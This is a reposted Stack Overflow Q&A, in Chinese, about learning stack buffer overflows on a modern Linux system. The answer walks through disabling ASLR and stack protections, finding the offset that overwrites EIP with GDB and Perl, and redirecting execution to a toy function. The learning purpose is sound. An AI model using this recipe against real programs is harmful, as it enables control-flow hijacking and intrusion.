gpt4 book ai didi

c - 如何在现代系统上测试缓冲区溢出?

转载 作者:太空狗 更新时间:2023-10-29 17:13:18 25 4
gpt4 key购买 nike

我目前有兴趣学习如何处理缓冲区溢出。我已经完成了相当多的汇编,并了解堆栈的工作原理以及如何在 C 中实现缓冲区溢出。但是,我在尝试让 GCC 4.9.1 允许我溢出时遇到了很多麻烦缓冲区适当。我正在运行 Debian Jessie。

Here是我在第 2.2 节中尝试遵循的教程。我已经复制/粘贴了他提供的 C 程序,并且我使用的是与他相同的 Perl 脚本,所以一切都与他的情况完全相同(当然,系统除外)。

这些是我一直得到的结果:

 ~/projects/buffer-overflow$ ls
run.pl test.c
~/projects/buffer-overflow$ sudo su
root@wash# echo "0" > /proc/sys/kernel/randomize_va_space
root@wash# exit
exit
~/projects/buffer-overflow$ gcc -m32 -fno-stack-protector -zexecstack test.c
~/projects/buffer-overflow$ ./run.pl
Address of foo = 0x804845b
Address of bar = 0x80484a4
My stack looks like:
(nil)
0xffffd4a8
0xf7e58b2f
0xf7fb3ac0
0x8048657
0xffffd494

ABCDEFGHIJKLMNOPP@
Now the stack looks like:
0xffffd718
0xffffd4a8
0xf7e58b2f
0xf7fb3ac0
0x42418657
0x46454443

最佳答案

那个 Perl 脚本在这里不是特别有用,不同的系统会使用不同的地址,所以让我们不用脚本来做...

首先,找出覆盖返回地址所需的确切字节数。我们可以用 GDB 和 Perl 做到这一点:

(gdb) run `perl -e 'print "A" x 26';`
Address of foo = 0x804845b
Address of bar = 0x80484a5
My stack looks like:
0xf7fb1000
0xffffdab8
0xf7e44476
0xf7fb1d60
0x8048647
0xffffdaa8

AAAAAAAAAAAAAAAAAAAAAAAAAA
Now the stack looks like:
0xffffdcbb
0xffffdab8
0xf7e44476
0xf7fb1d60
0x41418647
0x41414141


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

如您所见,26 个字节将覆盖 EIP,因此通过将最后四个“A”字符替换为我们的 bar() 函数地址(不要忘记将其置于小端格式),我们应该会成功:

(gdb) run `perl -e 'print "A" x 22';``perl -e 'print "\xa5\x84\x04\x8"';`
Address of foo = 0x804845b
Address of bar = 0x80484a5
My stack looks like:
0xf7fb1000
0xffffdab8
0xf7e44476
0xf7fb1d60
0x8048647
0xffffdaa8

AAAAAAAAAAAAAAAAAAAAAA��
Now the stack looks like:
0xffffdcbb
0xffffdab8
0xf7e44476
0xf7fb1d60
0x41418647
0x41414141

Augh! I've been hacked!

Program received signal SIGSEGV, Segmentation fault.
0xffffdc06 in ?? ()

如您所见,我们成功返回了 bar() 函数。

关于c - 如何在现代系统上测试缓冲区溢出?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/26250295/

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com